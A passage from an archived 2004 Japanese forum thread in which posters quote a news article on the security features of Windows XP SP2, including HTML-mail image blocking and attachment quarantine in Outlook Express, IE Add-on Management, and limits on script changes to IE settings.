>Outlook ExpressはHTMLメールから身を守れる
> MicrosoftはOutlook 2003において,HTML形式の電子メール内にある画像
>をブロックし,危険な可能性のある電子メールの添付物(例えば.exeという拡張
>子のファイル)を隔離するという,非常にニーズの高い安全対策を導入した。
>同社はXP SP2でこの機能をOutlook Expressに追加しようとしている。

675 :名無しさん@お腹いっぱい。:04/03/04 22:10
>>673
>ブラウザのアドオン管理はよくできている
> XP SP2のIEに追加される機能として,「Add-on Management」ツー
>ルがある。これはあなたがプラグインやツールバー,そのほかのご自
>分のシステムにインストールしたIEのアドオンを,リストの形で表示
>させたり,管理したりするのを手助けする。Add-on Managementツー
>ルは,私が知っているところでは,2つの基本機能を備えている。…

>IEの設定はスクリプトによる変更が不可に
> さて,IEに対するセキュリティ面の変更はこれだけに終わらない。
>XP SP2では,IEのウインドウに対してスクリプトによって設定変更を
>加えるのを防げる。

676 :名無しさん@お腹いっぱい。:04/03/12 17:10
 

202 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)